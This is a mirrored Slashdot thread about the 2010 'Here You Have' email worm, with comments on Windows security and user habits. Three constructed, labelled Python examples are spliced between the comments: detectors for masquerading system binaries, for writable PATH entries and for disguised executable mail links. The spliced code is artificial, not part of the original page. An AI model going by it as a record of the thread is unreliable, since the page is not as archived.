Slashdot Mirror


New Email Worm Squirming Through Windows Users' Inboxes

Trailrunner7 writes "There appears to be an actual email worm in circulation right now, using the tried-and-true infection method of sending emails containing malicious executables to all of the names in a user's email address book. The worm arrives via emails with the subject line 'Here You Have' or something similar, and the messages contain a link to a site that will download a malicious file to the victim's PC. The malware then drops itself into the Windows directory with a file name of CSRSS.EXE, which is identical to a legitimate Windows file. From there, it's 2001 all over again, as the worm attempts to mail itself to all of the contacts in the victim's Outlook address book."
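The summary says the worm parks itself in the Windows directory as CSRSS.EXE, a name borrowed from a genuine system binary that normally lives in %SystemRoot%\System32. A cheap first check on a suspect machine is therefore "does anything with a core-binary name run from somewhere it should not?". The script below is an added example, not code from the story or from any vendor tool; the table of expected directories is an assumption of this example, and the process inventory is constructed sample data rather than a real capture.

```python
"""Added example: flag files or processes whose name matches a well-known
Windows system binary but whose directory is not where that binary belongs.
EXPECTED_DIRS is an assumption for this example; SAMPLE is constructed."""

from pathlib import PureWindowsPath


def _norm(p: str) -> str:
    """Lower-case, backslash-normalised directory string for comparison."""
    return str(PureWindowsPath(p)).lower()


# Assumed canonical locations (normalised once at import time).
EXPECTED_DIRS = {
    "csrss.exe": {_norm(r"C:\Windows\System32")},
    "lsass.exe": {_norm(r"C:\Windows\System32")},
    "svchost.exe": {_norm(r"C:\Windows\System32"), _norm(r"C:\Windows\SysWOW64")},
    "explorer.exe": {_norm(r"C:\Windows")},
}


def classify(path: str) -> str:
    """Return 'ok', 'suspicious' or 'unknown' for one full path.

    'unknown' means the file name is not in the table at all, so no verdict
    can be given on location alone."""
    p = PureWindowsPath(path)
    name = p.name.lower()
    if name not in EXPECTED_DIRS:
        return "unknown"
    return "ok" if _norm(str(p.parent)) in EXPECTED_DIRS[name] else "suspicious"


def find_masquerades(inventory):
    """inventory: iterable of (label, full_path) pairs, e.g. from a process
    listing. Returns the entries where a system-binary name sits in the
    wrong directory."""
    return [(label, path) for label, path in inventory if classify(path) == "suspicious"]


# Constructed sample inventory resembling a process listing.
SAMPLE = [
    ("pid 512", r"C:\Windows\System32\csrss.exe"),
    ("pid 1337", r"C:\Windows\CSRSS.EXE"),  # the placement described in the story
    ("pid 900", r"C:\Windows\SysWOW64\svchost.exe"),
    ("pid 2048", r"C:\Users\bob\AppData\Local\Temp\svchost.exe"),
    ("pid 77", r"C:\Windows\explorer.exe"),
    ("pid 3000", r"C:\Program Files\Foo\foo.exe"),
]

if __name__ == "__main__":
    for label, path in find_masquerades(SAMPLE):
        print(f"{label}: {path} is outside the expected directory")
```

Path alone is only a triage signal: a hit should be confirmed with the file's Authenticode signature, hash and parent process before anyone calls it malware, and a miss says nothing about a file that uses a name the table does not know.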

473 comments

  1. Apples by sexconker · · Score: 4, Funny

    I thought worms were found in apples.

    1. Re:Apples by _Sprocket_ · · Score: 5, Funny

      No, they tend to stick to windows.

    2. Re:Apples by gmuslera · · Score: 2, Funny

      That was with the old-style apples... what newer ones have are iWorms

    3. Re:Apples by rickb928 · · Score: 1

      Usually only part of a worm.

      For a whole worm, use Windows.... Mostly.

      --
      deleting the extra space after periods so i can stay relevant, yeah.
    4. Re:Apples by Erikderzweite · · Score: 4, Funny

      That is why Steve Jobs takes a bite of every Apple he sells — to make sure there are no worms inside.

    5. Re:Apples by EEPROMS · · Score: 1

      Apple iWorms are magical thus always turn up and give the user a positive and life changing experience

    6. Re:Apples by Psicopatico · · Score: 1

      What's worse than biting an apple and find a worm?

      Finding only half.

      --
      Mastering the English language is fucking easy: all you have to do is to put an f* word in every fucking sentence.
    7. Re:Apples by Erikderzweite · · Score: 0, Offtopic

      Exactly. Does Steve Jobs look healthy to you? Now you know the reason why.

    8. Re:Apples by w0mprat · · Score: 2, Funny

      Steve Jobs has worms? Would explain his recent illness and weight loss.

      --
      After logging in slashdot still does not take you back to the page you were on. It's been that way for 20 years.
    9. Re:Apples by pspahn · · Score: 1

      Nah, those are those things you sometimes see floating around when you look at a clear blue sky. I had no idea what they were until I got a little older. Now it just pisses me off. Stupid iWorms.

      --
      Someone flopped a steamer in the gene pool.
    10. Re:Apples by drewhk · · Score: 2, Funny

      They turn into -- Butterflies!!

    11. Re:Apples by splutty · · Score: 1

      Nope. Worms carry Banana Bombs. (Shameless plug for the new Worms Reloaded ;)

      --
      Coz eternity my friend, is a long *ing time.
    12. Re:Apples by Anonymous Coward · · Score: 0

      Exactly. Does Steve Jobs look healthy to you? Now you know the reason why.

      It's from eating all those apples. Doctors refuse to approach him.

    13. Re:Apples by dirtyJay · · Score: 1

      Magical butterflies, get it right!

    14. Re:Apples by drewhk · · Score: 1

      I wanted to indicate that somehow, but I don't know the ASCII code for sparkles.

  2. So that's why the UW mail system went down by WillAffleckUW · · Score: 2, Informative

    The entire UW mail system died yesterday morning.

    Maybe this is why ...

    --
    -- Tigger warning: This post may contain tiggers! --
    1. Re:So that's why the UW mail system went down by causality · · Score: 4, Insightful

      The entire UW mail system died yesterday morning.

      Maybe this is why ...

      It's an instance of the reason why. The actual reason is that the users still haven't learned from the last 9 years of experience. The only bad thing is that their stupidity is not self-contained and can affect the networks and computers of others. I say that because this time, it isn't really a technical flaw in Windows since I don't see any reports of the e-mail attachments being automatically executed. This is more like a social engineering attack. It's one that is not remotely new and has provided numerous examples that the even slightly clueful have already learned from.

      --
      It is a miracle that curiosity survives formal education. - Einstein
    2. Re:So that's why the UW mail system went down by MichaelSmith · · Score: 5, Insightful

      Devil's advocate here: is there any reason why a normal non-technical Windows user should be able to run an executable in a directory they are able to write to? Maybe the iPod/iPad approach is better for most people.

    3. Re:So that's why the UW mail system went down by morgan_greywolf · · Score: 1

      You'd think by now UW would have written their own mail client or something.....

    4. Re:So that's why the UW mail system went down by Anonymous Coward · · Score: 1, Informative

      ...the users still haven't learned from the last 9 years of experience...

      You mean they haven't learned to stop using Outlook?

    5. Re:So that's why the UW mail system went down by causality · · Score: 5, Insightful

      Devil's advocate here: is there any reason why a normal non-technical Windows user should be able to run an executable in a directory they are able to write to? Maybe the iPod/iPad approach is better for most people.

      I have no idea why you were modded "Troll" except that some people have an irrational oversensitivity to any mention of the iPod or iPad. They should get the fuck over it, to be direct about it.

      Back on topic, what you mention is a very good idea. It's also not new to Apple products at all. That's the approach Unix has used for a long, long time now. Installed programs on a Unix system are generally root-owned and sit in directories that are also root-owned. For a normal user, both the executable and the directory in which it is located is read-only.

      The problem with Windows is the vast amount of software that is poorly designed and wants Admin privileges even though it could be designed to carry out its task without them. This has trained the more point-and-drool type of user (the majority who gravitate to this platform) to just click away any dialogs without seriously questioning why a program is requesting extra access. That is, of course, assuming they are running as a non-privileged user in the first place.

      The iPhone (I assume you don't intentionally refer to an mp3 player) approach is more like "you don't need root for anything, let us manage that". The Unix approach is more like "programs don't expect to have root privileges without a very good reason, like your package manager for example". In both cases an e-mail client would be run as a normal user. I'm not so familiar with the inner workings of an iPhone but at least on Unix and Unix-like OSs, the binary executable file would also reside in a root-owned directory not writable to any normal user. Combine that with the generally more clueful user base and it's easy to understand why Unix/Unix-like users just don't have these problems.

      --
      It is a miracle that curiosity survives formal education. - Einstein
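The Unix layout described in the comment above (root-owned executables in root-owned, read-only directories) is only as good as the directories actually on a user's search path. The script below is an added example, not code from the thread, that audits a list of directories for ones the current user can write to and for executables inside them the user can modify. The mode-bit evaluation is kept as a pure function so it can be exercised on constructed ownership values; the demo scenario is constructed in a temporary directory.

```python
"""Added example: audit executable search-path directories for entries the
current (non-root) user can write to. Not code from the thread; the demo
scenario is constructed."""

import os
import stat
import tempfile


def writable_by(st_mode, st_uid, st_gid, uid, gids):
    """True if a file with these owner/group/mode bits is writable by user
    `uid` holding groups `gids`. Root is treated as able to write anything."""
    if uid == 0:
        return True
    if st_uid == uid:
        return bool(st_mode & stat.S_IWUSR)
    if st_gid in gids:
        return bool(st_mode & stat.S_IWGRP)
    return bool(st_mode & stat.S_IWOTH)


def audit_path(dirs, uid=None, gids=None):
    """Return findings as (kind, path) tuples:
      ('writable-dir', d)  - the user can create/replace files in d
      ('writable-exec', p) - p is an executable regular file the user can modify
    Directories that do not exist are skipped."""
    uid = os.getuid() if uid is None else uid
    gids = set(os.getgroups()) if gids is None else set(gids)
    exec_bits = stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH
    findings = []
    for d in dirs:
        try:
            st = os.stat(d)
        except FileNotFoundError:
            continue
        if writable_by(st.st_mode, st.st_uid, st.st_gid, uid, gids):
            findings.append(("writable-dir", d))
        for name in sorted(os.listdir(d)):
            p = os.path.join(d, name)
            try:
                fst = os.stat(p)
            except FileNotFoundError:
                continue
            if stat.S_ISREG(fst.st_mode) and fst.st_mode & exec_bits \
                    and writable_by(fst.st_mode, fst.st_uid, fst.st_gid, uid, gids):
                findings.append(("writable-exec", p))
    return findings


def demo():
    """Constructed scenario: a directory the user owns, holding an executable
    the user can modify. Returns the kinds of findings produced."""
    with tempfile.TemporaryDirectory() as d:
        exe = os.path.join(d, "update-checker")
        with open(exe, "w") as f:
            f.write("#!/bin/sh\necho hello\n")
        os.chmod(exe, 0o755)  # owner-writable and executable
        return [kind for kind, _ in audit_path([d])]


if __name__ == "__main__":
    for kind, path in audit_path(os.environ.get("PATH", "").split(os.pathsep)):
        print(f"{kind}: {path}")
```

Run against the real PATH, a clean system should report nothing for /bin, /usr/bin and friends; a hit on something like ~/bin is exactly the "executable in a directory they are able to write to" case the thread is arguing about, and is where a dropped binary would survive.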
    6. Re:So that's why the UW mail system went down by 93+Escort+Wagon · · Score: 3, Informative

      You'd think by now UW would have written their own mail client or something.....

      Problem is - those both suck (yes I'm at UW).

      Of course like many universities, UW now offers hosted Gmail - a much better web option than pine or alpine IMHO. I realize there are security implications using hosted Gmail, but when the other main option is UW servers accessed via Outlook then it's a bit harder to argue about Gmail's security.

      Unfortunately, my department's default mail client is still Outlook. That decision was made by someone who's never used anything BUT Outlook, and so doesn't realize just how behind it is... several of us have argued for Thunderbird (which UW does officially support) but PHB always gives a rambling, incoherent statement against and it doesn't happen.

      --
      #DeleteChrome
    7. Re:So that's why the UW mail system went down by DragonWriter · · Score: 1

      Devil's advocate here: is there any reason why a normal non-technical Windows user should be able to run an executable in a directory they are able to write to?

      Normal, non-technical Windows users often own their own machines; consequently, yes, they should be able to run an executable in a directory they are able to write to.

    8. Re:So that's why the UW mail system went down by Annorax · · Score: 5, Interesting

      No, it's more of the fact that "a sucker is born every minute" or more along the lines of every millisecond.

      The college freshmen of today never experienced the "2001 all over again", so they are ripe for the pickings of email bombs that look "old hat" to old farts like us.

    9. Re:So that's why the UW mail system went down by WillAffleckUW · · Score: 1

      We only have about six computers in our labs that run Windows, mostly for submission reasons, and unfortunately some of those are required to use Outlook. Most of the rest are Linux.

      --
      -- Tigger warning: This post may contain tiggers! --
    10. Re:So that's why the UW mail system went down by Anonymous Coward · · Score: 0

      Actually, it's due to the decisions of incompetent, computer-illiterate, corrupt 'decision-makers', who have been coerced into signing 'MS junk only' support contracts, licensing deals, etc.

      Go ahead, see if you can find out ANYTHING about your school's/employer's MS contracts. Good luck with that.
      The secrecy keeps the corruption under wraps, sending billions to MS, while billions more are eaten up in 'support issues', etc. Dunce-head 'administrators' think infected computers are just the way the world works, and sign some contracts and send loads of money to look after all of these 'problems'. Great for business, not so good for anyone else who wants to actually use a computer to accomplish something.

    11. Re:So that's why the UW mail system went down by causality · · Score: 3, Insightful

      Devil's advocate here: is there any reason why a normal non-technical Windows user should be able to run an executable in a directory they are able to write to?

      Normal, non-technical Windows users often own their own machines; consequently, yes, they should be able to run an executable in a directory they are able to write to.

      It's not so much about whether you should be allowed to do with your own property what you wish. Of course you should. It's more like the security model of capabilities. If there is no good reason to allow something to happen then it is better security not to allow it.

      This breaks down in Windows because Windows does not have a centralized package manager that handles both the installation and the uninstallation of all new software. The proprietary nature of most Windows software would preclude such a thing. A Linux user can have the full use of their system without ever having to directly download a binary executable and then run that executable just to install or use a piece of software. Instead, they have package managers and repositories which have all but eliminated the issues of third-party malware.

      By contrast, on Windows it is far more common to directly download an "Installer.exe" file and then run that installer in the directory into which it was downloaded and with the elevated privileges needed to install software. That introduces problems when such executables come from untrustworthy sources. Introducing undetected malware into a Linux repository is much more difficult and thus has occurred far less frequently than the much easier task of conducting a social engineering attack against a user of an e-mail client.

      The way things are done on Windows makes it far more prone to these attacks. The fact that the average Windows user is much less knowledgeable than the average *nix user compounds the problem. That's why you have attacks that are about nine years old that are still successful, which is really quite pathetic.

      --
      It is a miracle that curiosity survives formal education. - Einstein
    12. Re:So that's why the UW mail system went down by binarylarry · · Score: 1, Insightful

      I think a better route would be make that the default method/policy and make it hard for the average user to it.

      That would sit better with me than the Apple "We fucking own you" approach that requires you to physically hack the product you just "bought."

      --
      Mod me down, my New Earth Global Warmingist friends!
    13. Re:So that's why the UW mail system went down by causality · · Score: 1

      Devil's advocate here: is there any reason why normal non-technical people should be using computers?

      There, fixed that for you. If people can't be bothered to learn how to use computers, then they should stay the fuck away from computers.

      There are such things as learning experiences, where you make a mistake, pay the price, and learn your lesson. What really amazes me are what I call the "permanent noobs". They're the people who manage to use a system for years and years without ever knowing more about it than when they first started. It's like they hate learning and hate understanding the tools they use, and will actively resent anyone who suggests that they should have picked up a clue or two during their years of experience with a system.

      It's understandable that if you are new to something and have little or no experience, then you won't be knowledgeable. Expecting otherwise is exceedingly unrealistic. Every expert was once a beginner. But for the people who have had years of time to learn the most basic things, to acquire the most basic good practices, something is wrong with them. This should be classified as a type of learning disability, regarded as a pathology, and treated accordingly.

      --
      It is a miracle that curiosity survives formal education. - Einstein
    14. Re:So that's why the UW mail system went down by Erikderzweite · · Score: 1

      New users keep coming as even more PCs are sold. Blinded by marketspeak about how easy a PC (i.e. Windows) is, they refuse to learn. That is very unfortunate because said people have vast computing powers that easily outperform supercomputers just a few decades old. Coupled with the attitude that their time is too valuable to learn something about computers they use (insert your favorite car analogy here) this refusal to educate themselves creates an ever growing problem for the network as a whole: when a PC is infected to a crawl these people tend to buy a new one, with even more computing power.

    15. Re:So that's why the UW mail system went down by ShaunC · · Score: 1

      The iPhone (I assume you don't intentionally refer to an mp3 player)

      FYI, the iPod Touch models do just about everything the iPhone does, except take pictures and make phone calls.

      --
      Thanks to the War on Drugs, it's easier to buy meth than it is to buy cold medicine!
    16. Re:So that's why the UW mail system went down by DragonWriter · · Score: 3, Insightful

      It's not so much about whether you should be allowed to do with your own property what you wish. Of course you should. It's more like the security model of capabilities. If there is no good reason to allow something to happen then it is better security not to allow it.

      I am aware of the basis of your questions; what I am saying is that the fact that normal, non-technical Windows users often don't have someone else to administer their machines means that they have to be able to run executables from directories that they can write to.

      Now, distinct security roles for the same user can mitigate some of this risk, and it might make sense to not allow a normal Windows user to run code that they have "casual" write access to (e.g., without escalating to an administrative role temporarily), but the problem with that is finding a way to make the security model simple and comprehensible enough that users don't simply get into the habit of escalating to an administrative role to do things without understanding what they are doing.

      This is not a particularly easy problem, because for a general purpose computer, you have to have a fairly fine grained security model to allow software to do what the user wants it to but not other things, and non-technical users aren't going to want to learn the details of a fine-grained security model.

      Instead, they have package managers and repositories which have all but eliminated the issues of third-party malware.

      I don't think that's really all that true; if Linux becomes popular enough with casual users that the kind of malware that is directed at them becomes worth targeting at the platform, third party repositories will be setup and emailed invitations distributed to add them and download screen savers and other seemingly-innocuous software from them. Which will, of course, be malware that the users are being tricked into installing with elevated privileges. (Of course, you can install packages on Linux straight from files -- even files in email -- since, e.g., Ubuntu, IIRC, runs the graphical package manager by default if you click on a .deb; while many Linux systems have security models that are somewhat better than Windows, I don't think they are all that much more secure against social engineering directed at non-technical users with administrative rights on their own boxes.)

    17. Re:So that's why the UW mail system went down by Missing.Matter · · Score: 4, Insightful

      A repository wouldn't change anything in this situation. It's incredible, but I guarantee you most people who installed this probably have heard that malware can come in e-mail attachments. My direct family is all aware of this, and how many times have I been called over to fix something because they thought it was "okay?" Another poster here related how his friend downloaded this very worm, despite the fact he thought it was shady.

      So we have a situation where users are happy to install programs not just from an unknown source, but from a very likely unsafe source! Why? Who knows? They need to see that latest celeb sex tape or are waiting for an attachment and didn't pay close attention to what they're clicking on.

      So yeah, let's give these users a repo and tell them it's safe and they can only install programs from there. Oh but wait, now they want a piece of software that isn't in the repo, and again we're in a situation where users have to judge for themselves how legitimate a piece of software is; I've already demonstrated how that usually turns out.

    18. Re:So that's why the UW mail system went down by Mongoose+Disciple · · Score: 1

      You mean they haven't learned to stop using Outlook?

      In the business world, there still isn't a replacement for it that's good enough.

      It's sad, but, there it is.

    19. Re:So that's why the UW mail system went down by Anonymous Coward · · Score: 0

      is there any reason why a normal non-technical Windows user should be able to run an executable in a directory they are able to write to?

      If the user decided to change their umask, who are you to call them non-technical, you arrogant pri--what? Windows still doesn't have umask or use file permissions to control executability? Oops, never mind.

      The real answer to your question is that there shouldn't be such a thing as a "normal non-technical windows user." If you use Windows, you damn well better be a computer wiz and it's not intended for other types of people. The owner of a gun with a U-shaped barrel which points at the holder, does need gun safety lessons.

    20. Re:So that's why the UW mail system went down by causality · · Score: 2, Insightful

      So yeah, let's give these users a repo and tell them it's safe and they can only install programs from there. Oh but wait, now they want a piece of software that isn't in the repo, and again we're in a situation where users have to judge for themselves how legitimate a piece of software is; I've already demonstrated how that usually turns out.

      Ah but that's a direct refusal to utilize the software repos as a trusted source. Just because a user refuses to get their software from a trusted source does not constitute a flaw in the trusted source. To give a car analogy, sure you can drive your car without a seatbelt, but it won't surprise anyone if you are seriously injured in an accident that you could have walked away from. That doesn't mean that seatbelts don't work or aren't a good idea.

      --
      It is a miracle that curiosity survives formal education. - Einstein
    21. Re:So that's why the UW mail system went down by causality · · Score: 0, Troll

      New users keep coming as even more PCs are sold. Blinded by marketspeak about how easy a PC (i.e. Windows) is, they refuse to learn. That is very unfortunate because said people have vast computing powers that easily outperform supercomputers just a few decades old. Coupled with the attitude that their time is too valuable to learn something about computers they use (insert your favorite car analogy here) this refusal to educate themselves creates an ever growing problem for the network as a whole: when a PC is infected to a crawl these people tend to buy a new one, with even more computing power.

      That's why I'd like to see Microsoft forced to assume product liability so long as they market their software to the general public on the basis of "ease of use". Either market it to "technically knowledgable users only" or pay monetary damages to anyone and everyone who suffers in any way due to security issues. Until then, Microsoft gets to profit handsomely from Windows and Windows software without bearing any of the cost of its downsides. That gives them the rightful status of a parasite. This is what needs to change.

      --
      It is a miracle that curiosity survives formal education. - Einstein
    22. Re:So that's why the UW mail system went down by sqlrob · · Score: 1

      Windows still doesn't have umask or use file permissions to control executability?

      Uhh, yeah it does and has since NTFS was released. ACLs are inherited (not quite umask, but close), and you can make something non-executable with permissions.

    23. Re:So that's why the UW mail system went down by node_chomsky · · Score: 1

      ...except take pictures and make phone calls.

      Which is what makes it an iPhone as opposed to an iPod.

    24. Re:So that's why the UW mail system went down by Timmy+D+Programmer · · Score: 1

      I'm still constantly fighting with management at my company who think Outlook is the "Standard" and want it. This is one of the major reasons I do NOT want it. If I ever lose that battle, I will make sure the first time this happens that the decision maker gets full credit for the decision.

      --
      (If at first you don't succeed, do it different next time!)
    25. Re:So that's why the UW mail system went down by SideshowBob · · Score: 1, Informative

      Devil's advocate here: is there any reason why a normal non-technical Windows user should be able to run an executable in a directory they are able to write to? Maybe the iPod/iPad approach is better for most people.

      Back on topic, what you mention is a very good idea. It's also not new to Apple products at all. That's the approach Unix has used for a long, long time now. Installed programs on a Unix system are generally root-owned and sit in directories that are also root-owned. For a normal user, both the executable and the directory in which it is located is read-only.

      It's certainly possible for a Linux user to download an executable to his/her home directory and run it. That was GP's point.

    26. Re:So that's why the UW mail system went down by Missing.Matter · · Score: 1

      But as you point out seat belts only work if people use them, and if you remember, there was a lot of resistance to the idea despite the evidence that seat belts save lives. My grandmother refuses to wear one to this day because it's "uncomfortable."

      If these people wouldn't change their behavior when their lives literally depended on it, what makes you think they'll stick in their trusty repo garden?

      And as DragonWriter pointed out, if users are taught to trust repos, it's only a matter of time until these users are directed to a "sexy celeb screensaver" repo of filth.

    27. Re:So that's why the UW mail system went down by sjames · · Score: 1

      It is, in part, a long standing design error. The actions for viewing a document and for running an executable are exactly the same. The error was compounded by hiding all evidence in the UI that a given file is actually an executable.

      The result is and was entirely predictable.

    28. Re:So that's why the UW mail system went down by RocketRabbit · · Score: 1

      The reason that Pine isn't used any more is because MS gave a bunch of money to UW, on the understanding that they would switch away from Unix wherever possible.

    29. Re:So that's why the UW mail system went down by c6gunner · · Score: 1

      That's why I'd like to see Microsoft forced to assume product liability so long as they market their software to the general public on the basis of "ease of use". Either market it to "technically knowledgable users only" or pay monetary damages to anyone and everyone who suffers in any way due to security issues.

      I agree. Likewise, Volkswagen should be sued into bankruptcy for marketing their vehicles as "people cars". They should either be forced to change the name to Technischversiertenwagen, or pay monetary damages to anyone and everyone who suffers in any way due to car accidents.

    30. Re:So that's why the UW mail system went down by causality · · Score: 2, Insightful

      Devil's advocate here: is there any reason why a normal non-technical Windows user should be able to run an executable in a directory they are able to write to? Maybe the iPod/iPad approach is better for most people.

      Back on topic, what you mention is a very good idea. It's also not new to Apple products at all. That's the approach Unix has used for a long, long time now. Installed programs on a Unix system are generally root-owned and sit in directories that are also root-owned. For a normal user, both the executable and the directory in which it is located is read-only.

      It's certainly possible for a Linux user to download an executable to his/her home directory and run it. That was GP's point.

      Sure. For that matter, it's possible for you to deliberately chew on broken glass. So what? The point is, Linux users have little or no need to get their software that way. So they overwhelmingly tend not to do so. I don't know how to make this any simpler. There are none so blind as those who refuse to see and you very well may be one of those.

      --
      It is a miracle that curiosity survives formal education. - Einstein
    31. Re:So that's why the UW mail system went down by MrCrassic · · Score: 1

      Email servers should be blocking emails with .EXE files before they even get anywhere close to the user's inbox. I guess this will expose systems that need a bit of work...

    32. Re:So that's why the UW mail system went down by drsmithy · · Score: 1

      Devil's advocate here: is there any reason why a normal non-technical Windows user should be able to run an executable in a directory they are able to write to?

      So they can run legitimate software they may have downloaded, compiled, or otherwise acquired themselves?

    33. Re:So that's why the UW mail system went down by Anonymous Coward · · Score: 1, Insightful

      By that logic, why implement any security measures at all? They can always be circumvented by an idiot user.

    34. Re:So that's why the UW mail system went down by drsmithy · · Score: 1

      This breaks down in Windows because Windows does not have a centralized package manager that handles both the installation and the uninstallation of all new software. The proprietary nature of most Windows software would preclude such a thing.

      No, it does not. The only real barrier to something like that on Windows is the usual cries of "monopoly", which tend to be louder on Slashdot than anywhere else.

      If Microsoft released Windows with a default configuration that could only install applications they approved of, Slashdot would be in a state of apoplectic outrage, even if it was trivially simple (say, a checkbox in a control panel) to turn that feature off (that is to say, defeat the purpose of having it at all).

    35. Re:So that's why the UW mail system went down by dbIII · · Score: 2, Funny

      The college freshmen of today never experienced the "2001 all over again"

      That's right all you college freshmen going ape at parties, don't touch that big black monolith or bad stuff will happen.

    36. Re:So that's why the UW mail system went down by Drgnkght · · Score: 1

      I've seen one of these emails at work today. The payload was a link to a website hosting an executable with the .scr file extension. There is no executable content in the message itself. The hyperlink was crafted so it appeared to link to a document. In the message I received it was disguised as a PDF file.
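The comment above describes the actual delivery: no attachment, just a hyperlink whose visible text looks like a PDF while the target is a .scr file. Together with the earlier points about blocking executable attachments at the mail server and about file managers hiding the real extension (so "report.pdf.exe" displays as "report.pdf"), that suggests a small mail-side check. The code below is an added example, not from the thread or any mail product: it parses a message, reports links whose target path ends in an executable extension (noting when the link text claims to be a document) and attachments with executable or double extensions. The message is constructed inline, and the extension sets are an assumption of this example, not an authoritative list.

```python
"""Added example: detect executable links disguised as documents and
executable / double-extension attachments in a mail message. Not code from
the thread; the sample message is constructed and the extension sets are
an assumption."""

import email.policy
import posixpath
from email import message_from_bytes
from email.message import EmailMessage
from html.parser import HTMLParser
from urllib.parse import urlparse

EXEC_EXTS = {".exe", ".scr", ".pif", ".com", ".bat", ".cmd", ".vbs", ".js"}
DOC_EXTS = {".pdf", ".doc", ".docx", ".xls", ".xlsx", ".txt"}


def _ext(name: str) -> str:
    return posixpath.splitext(name.lower())[1]


class _Links(HTMLParser):
    """Collect (href, visible text) pairs from an HTML body."""
    def __init__(self):
        super().__init__()
        self.links, self._href, self._text = [], None, []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href = dict(attrs).get("href")
            self._text = []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append((self._href, "".join(self._text).strip()))
            self._href = None


def link_findings(html: str):
    """Flag anchors whose target path has an executable extension. If the
    visible text itself looks like a document name or document URL, report
    the stronger 'disguised' verdict."""
    p = _Links()
    p.feed(html)
    out = []
    for href, text in p.links:
        if _ext(urlparse(href).path) in EXEC_EXTS:
            claims_doc = _ext(urlparse(text).path) in DOC_EXTS
            out.append(("exec-link-disguised-as-document" if claims_doc else "exec-link", href))
    return out


def attachment_findings(msg):
    """Flag attachments with executable extensions; 'double-extension' when a
    document extension is hidden in front of it (invoice.pdf.exe)."""
    out = []
    for part in msg.iter_attachments():
        name = part.get_filename() or ""
        if _ext(name) in EXEC_EXTS:
            inner = _ext(posixpath.splitext(name)[0])
            out.append(("double-extension" if inner in DOC_EXTS else "exec-attachment", name))
    return out


def scan(raw: bytes):
    """Parse a raw RFC 5322 message and return all findings."""
    msg = message_from_bytes(raw, policy=email.policy.default)
    findings = attachment_findings(msg)
    body = msg.get_body(preferencelist=("html",))
    if body is not None:
        findings += link_findings(body.get_content())
    return findings


def build_sample() -> bytes:
    """Constructed message modelled on the description in the comment above."""
    m = EmailMessage()
    m["From"] = "someone@example.invalid"
    m["To"] = "victim@example.invalid"
    m["Subject"] = "Here you have"
    m.set_content("Hello, this is the document I told you about.")
    m.add_alternative(
        '<p>Hello,</p><p><a href="http://example.invalid/files/PDF_Document.scr">'
        'http://example.invalid/files/PDF_Document.pdf</a></p>', subtype="html")
    m.add_attachment(b"MZ...", maintype="application", subtype="octet-stream",
                     filename="invoice.pdf.exe")
    return bytes(m)


if __name__ == "__main__":
    for kind, what in scan(build_sample()):
        print(f"{kind}: {what}")
```

Extension matching on the URL path is deliberately the weak part: a server can hand back an executable from any path, so in a gateway this belongs next to content-type and download-side checks, not in place of them.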

    37. Re:So that's why the UW mail system went down by causality · · Score: 1

      But as you point out seat belts only work if people use them, and if you remember, there was a lot of resistance to the idea despite the evidence that seat belts save lives. My grandmother refuses to wear one to this day because it's "uncomfortable."

      If these people wouldn't change their behavior when their lives literally depended on it, what makes you think they'll stick in their trusty repo garden?

      Forgive my blatant insensitivity but that's the sort of person for whom the Darwin Awards site was created. In other words, it's not a huge surprise when someone who values a slight amount of comfort over life and limb suffers injury to life and limb. It's unfortunate but that's the priorities the person has chosen to have. I deal in reality however ugly it may sometimes be. In this case, it's ugly. I hope the lady never has to find out the hard way why her decision was a bad one.

      And as DragonWriter pointed out, if users are taught to trust repos, it's only a matter of time until these users are directed to a "sexy celeb screensaver" repo of filth.

      That's the difference between official repos endorsed and maintained by your distribution and unofficial third-party repos. There's a significant difference there. Not the least of which is that a user has to go out of their way (often editing config files) to enable a third-party repo. That makes it less likely that a user with no knowledge of how the system works is going to do that. It certainly doesn't make it impossible, nor is this the intent of the design, but it does ensure that a user who selects third-party repos is doing so at their own risk and has to take the initiative to make them available. That's still a damn sight better than the way things work on Windows.

      --
      It is a miracle that curiosity survives formal education. - Einstein
    38. Re:So that's why the UW mail system went down by turbidostato · · Score: 2, Insightful

      "it isn't really a technical flaw in Windows since I don't see any reports of the e-mail attachments being automatically executed. This is more like a social engineering attack."

      In a single word: PEBKAC

    39. Re:So that's why the UW mail system went down by MichaelSmith · · Score: 1

      Devil's advocate here: is there any reason why a normal non-technical Windows user should be able to run an executable in a directory they are able to write to?

      So they can run legitimate software they may have downloaded, compiled, or otherwise acquired themselves ?

      Perhaps they should just have to explicitly state that they want to run a downloaded program. Enter their password and read a warning. And yeah I know, if they have to do it all the time they will just click yes without thinking.

    40. Re:So that's why the UW mail system went down by MrCrassic · · Score: 1

      Yeah, you're right. I got a notification about this at work today as well, though we weren't affected by it. Sorry about the misinformation!

    41. Re:So that's why the UW mail system went down by turbidostato · · Score: 1

      "I think a better route would be make that the default method/policy and make it hard for the average user to it."

      Microsoft marketing droids think otherwise.

      And the free market has shown them right by making Bill Gates one of the richest men on the planet.

    42. Re:So that's why the UW mail system went down by causality · · Score: 3, Insightful

      This breaks down in Windows because Windows does not have a centralized package manager that handles both the installation and the uninstallation of all new software. The proprietary nature of most Windows software would preclude such a thing.

      No, it does not. The only real barrier to something like that on Windows is the usual cries of "monopoly", which tend to be louder on Slashdot than anywhere else.

      If Microsoft released Windows with a default configuration that could only install applications they approved of, Slashdot would be in a state of apoplectic outrage, even if it was trivially simple (say, a checkbox in a control panel) to turn that feature off (that is to say, defeat the purpose of having it at all).

      I think you fail to appreciate the proprietary nature of most Windows software. Even the freeware is closed-source and copyrighted in such a way that you are not authorized to redistribute it. That means you cannot legally operate a repository containing a library of Windows software from a single source, because you'd have to get written permission from the authors of each individual piece of software allowing you to redistribute their software from your single source. It'd be an absolute nightmare and one mistake would make you end up on the wrong end of a lawsuit.

      That is, of course, not beginning to address the issues surrounding the redistribution of commercial for-pay software. Redistributing that without the express blessing of the creator is usually called "piracy" and may be severely punished by the civil courts.

      The only way around this would be for Microsoft to create a walled-garden type of environment sort of like Apple's App Store. Then they could dictate what licenses and/or terms of copyright are and are not acceptable. But you better believe that this would raise monopoly issues when that single vendor controls over 90% of the marketshare. Want your software to reach 90% of all desktop users? Then you play by their rules, or else. At that point the software license is no longer between the vendor and the user who is their customer; Microsoft is now the referee whether or not this is against the will of the vendor or user.

